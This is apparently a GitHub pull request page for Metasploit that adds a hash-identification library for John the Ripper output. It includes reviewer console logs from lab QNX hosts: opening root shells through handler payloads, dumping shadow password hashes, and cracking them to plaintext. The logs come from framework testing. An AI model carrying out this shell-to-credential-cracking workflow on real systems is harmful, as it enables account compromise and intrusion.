Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

create hash identifier library #11622

Merged
merged 2 commits into from Mar 26, 2019
Merged

create hash identifier library #11622

merged 2 commits into from Mar 26, 2019

Conversation

@h00die
Copy link
Contributor

h00die commented Mar 23, 2019

#11335 (comment)

This PR takes code from a few post libraries that pull hashes and need to identify which type of hash they are, to then get the jtr format, and puts it in a library.
It also adds qnx hash identification and output (untested).

This is not meant to be an all in one solution the way hash-id or hash-identifier are, this just centralizes the few hash types we actually have modules to deal with (and are nonreplayablehashes, as opposed to nt/lm or postgres)

  • @bcoles if you have a qnx you could hashdump, then run a creds -o qnx.jtr it should output them in a jtr friendly way. Please verify. I did not add it to the linux cracker module.
msf5 post(linux/gather/hashdump) > run

[+] ubuntu:$6$s/P86y1v$3iCYV5UoCwcxqmEns.LoC8WNahnwdNNCwABJ9vNzOY5bR2INug.ErrKZpG6LL06KxD7I5292iJpbxIna3pjKH.:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20190323140036_default_192.168.2.139_linux.hashes_617066.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host           origin         service       public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
----           ------         -------       ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
               111.111.1.111                ubuntu              $6$s/P86y1v$3iCYV5UoCwcxqmEns.LoC8WNahnwdNNCwABJ9vNzOY5bR2INug.ErrKZpG6LL06KxD7I5292iJpbxIna3pjKH.                                                                                                                                                                           Nonreplayable hash  sha512,crypt

@h00die h00die added the library label Mar 23, 2019
@wvu-r7

This comment has been minimized.

Copy link
Member

wvu-r7 commented Mar 23, 2019

Nice effort! I'd like to see this one grow for sure.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Mar 24, 2019

Output for QNX (using post/linux/gather/hashdump) below. The hashes in /etc/shadow were not in the old QNX format. I tried to force QNXCRYPT but it didn't work as expected.

QNX 6.5 SP1

# ./msfconsole 
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  
  LOGON: Help Logon

  HELP NOT AVAILABLE


  LOGON: Help Games

  'GAMES' REFERS TO MODELS, SIMULATIONS AND GAMES
  WHICH HAVE TACTICAL AND STRATEGIC APPLICATIONS.

  List of Games
  FALKEN'S MAZE
  BLACK JACK           .=======================.
  GIN RUMMY           |                         |
  HEARTS              |  SHALL WE PLAY A GAME ? |
  BRIDGE              |                         |
  CHECKERS             '======================='
  CHESS
  POKER
  FIGHTER COMBAT
  GUERRILLA ENGAGEMENT
  DESERT WARFARE
  AIR-TO-GROUND ACTIONS
  THEATERWIDE TACTICAL WARFARE
  THEATERWIDE BIOTOXIC AND CHEMICAL WARFARE

  GLOBAL THERMONUCLEAR WAR

  LOGON: JOSHUA


       =[ metasploit v5.0.14-dev-6218d8920d               ]
+ -- --=[ 1883 exploits - 1064 auxiliary - 329 post       ]
+ -- --=[ 553 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > db_connect msf:msf@127.0.0.1/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set rhost 172.16.191.216
rhost => 172.16.191.216
msf5 exploit(multi/handler) > set payload cmd/unix/bind_awk 
payload => cmd/unix/bind_awk
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.16.191.216:4444
[*] Command shell session 1 opened (172.16.191.165:33845 -> 172.16.191.216:4444) at 2019-03-24 00:11:42 -0400

id
uid=0(root) gid=0(root) groups=0(root),1(bin),3(sys),4(adm),5(tty)
bkd> uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
bkd> ^Z
Background session 1? [y/N]  y

msf5 exploit(multi/handler) > use post/linux/gather/hashdump 
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------

msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > set verbose true
verbose => true
msf5 post(linux/gather/hashdump) > run

[!] SESSION may not be compatible with this module.
[+] Shadow saved in: /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.shadow_593610.txt
[+] passwd saved in: /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.passwd_269314.txt
[+] root:4342xvyAHj.vg:0:0:Superuser:/root:/bin/sh
[+] test:M5AxUe/dgZLy2:100:100:test:/home/test:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.hashes_464175.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.hashes_464175.txt
[*] exec: cat /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.hashes_464175.txt

root:4342xvyAHj.vg:0:0:Superuser:/root:/bin/sh
test:M5AxUe/dgZLy2:100:100:test:/home/test:/bin/sh
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin          service  public  private        realm  private_type        JtR Format
----  ------          -------  ------  -------        -----  ------------        ----------
      172.16.191.216           root    4342xvyAHj.vg         Nonreplayable hash  des,bsdi,crypt
      172.16.191.216           test    M5AxUe/dgZLy2         Nonreplayable hash  des,bsdi,crypt

msf5 post(linux/gather/hashdump) > creds -o qnx.jtr
[*] Wrote creds to /root/Desktop/metasploit-framework/qnx.jtr
msf5 post(linux/gather/hashdump) > john /root/Desktop/metasploit-framework/qnx.jtr
[*] exec: john /root/Desktop/metasploit-framework/qnx.jtr

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (descrypt, traditional crypt(3) [DES 256/256 AVX2-16])
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
test             (test)
toor             (root)
2g 0:00:00:00 DONE 1/3 (2019-03-24 00:15) 200.0g/s 51100p/s 51200c/s 51200C/s root..*root
Use the "--show" option to display all of the cracked passwords reliably
Session completed

QNX 6.5

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.217:65530) at 2019-03-24 00:26:41 -0400

id
uid=0(root) gid=0(root) groups=0(root),1(bin),3(sys),4(adm),5(tty)
uname -a
QNX localhost 6.5.0 2010/07/09-14:43:25EDT x86pc x86
^Z
Background session 2? [y/N]  y

msf5 exploit(multi/handler) > use post/linux/gather/hashdump 
msf5 post(linux/gather/hashdump) > set session 2
session => 2
msf5 post(linux/gather/hashdump) > set verbose true
verbose => true
msf5 post(linux/gather/hashdump) > run

[!] SESSION may not be compatible with this module.
[+] Shadow saved in: /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.shadow_900314.txt
[+] passwd saved in: /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.passwd_350778.txt
[+] root:KGETopRxmES7Q:0:0:Superuser:/root:/bin/sh
[+] test:PIzPiIhlhCr9o:100:100:test:/home/test:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.hashes_933957.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.hashes_933957.txt
[*] exec: cat /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.hashes_933957.txt

root:KGETopRxmES7Q:0:0:Superuser:/root:/bin/sh
test:PIzPiIhlhCr9o:100:100:test:/home/test:/bin/sh
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin          service  public  private        realm  private_type        JtR Format
----  ------          -------  ------  -------        -----  ------------        ----------
      172.16.191.247           root    KGETopRxmES7Q         Nonreplayable hash  des,bsdi,crypt
      172.16.191.247           test    PIzPiIhlhCr9o         Nonreplayable hash  des,bsdi,crypt

msf5 post(linux/gather/hashdump) > creds -o qnx.jtr
[*] Wrote creds to /root/Desktop/metasploit-framework/qnx.jtr
msf5 post(linux/gather/hashdump) > john /root/Desktop/metasploit-framework/qnx.jtr
[*] exec: john /root/Desktop/metasploit-framework/qnx.jtr

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (descrypt, traditional crypt(3) [DES 256/256 AVX2-16])
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
test             (test)
toor             (root)
2g 0:00:00:00 DONE 1/3 (2019-03-24 00:27) 200.0g/s 51100p/s 51200c/s 51200C/s root..*root
Use the "--show" option to display all of the cracked passwords reliably
Session completed
msf5 post(linux/gather/hashdump) > 

The good news is that the export to JtR format worked, and John successfully cracked them - although further tests revealed JtR didn't crack one hash, for reasons which I didn't bother to explore:

msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin          service  public  private        realm  private_type        JtR Format
----  ------          -------  ------  -------        -----  ------------        ----------
      172.16.191.216           root    4342xvyAHj.vg         Nonreplayable hash  des,bsdi,crypt
      172.16.191.216           test    M5AxUe/dgZLy2         Nonreplayable hash  des,bsdi,crypt
      172.16.191.216           user    RSWn2JO}}mDx3         Nonreplayable hash  des,bsdi,crypt

msf5 post(linux/gather/hashdump) > creds -o qnx.jtr
[*] Wrote creds to /root/Desktop/metasploit-framework/qnx.jtr
msf5 post(linux/gather/hashdump) > john --format=qnx /root/Desktop/metasploit-framework/qnx.jtr 
[*] exec: john --format=qnx /root/Desktop/metasploit-framework/qnx.jtr 

Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
msf5 post(linux/gather/hashdump) > john /root/Desktop/metasploit-framework/qnx.jtr 
[*] exec: john /root/Desktop/metasploit-framework/qnx.jtr 

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (descrypt, traditional crypt(3) [DES 256/256 AVX2-16])
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
test             (test)
toor             (root)
2g 0:00:00:00 DONE 1/3 (2019-03-24 00:44) 100.0g/s 25550p/s 25600c/s 25600C/s root..*root
Use the "--show" option to display all of the cracked passwords reliably
Session completed
msf5 post(linux/gather/hashdump) > 

Note the password for user user was not identified or cracked by John. I'm using John from Kali packages, rather than jumbo bleeding edge, which may or may not be an issue.

Either way, the issue appears to lie with John or myself, not this PR.

@busterb busterb self-assigned this Mar 26, 2019
@busterb busterb added the enhancement label Mar 26, 2019
@busterb

This comment has been minimized.

Copy link
Member

busterb commented Mar 26, 2019

LGTM, thanks @h00die

@busterb busterb merged commit 656ea52 into rapid7:master Mar 26, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
busterb added a commit that referenced this pull request Mar 26, 2019
@busterb

This comment has been minimized.

Copy link
Member

busterb commented Mar 26, 2019

Release Notes

This merges common code for identifying password hashes, sharing them between various password cracking modules and simultaneously adding additional hash support

@jmartin-r7 jmartin-r7 added the msf5 label Mar 26, 2019
@jmartin-r7

This comment has been minimized.

Copy link
Member

jmartin-r7 commented Mar 26, 2019

This also interacts with files updated in jtr modernization, marking msf5.

@h00die h00die deleted the h00die:qnx branch Apr 12, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants
You can’t perform that action at this time.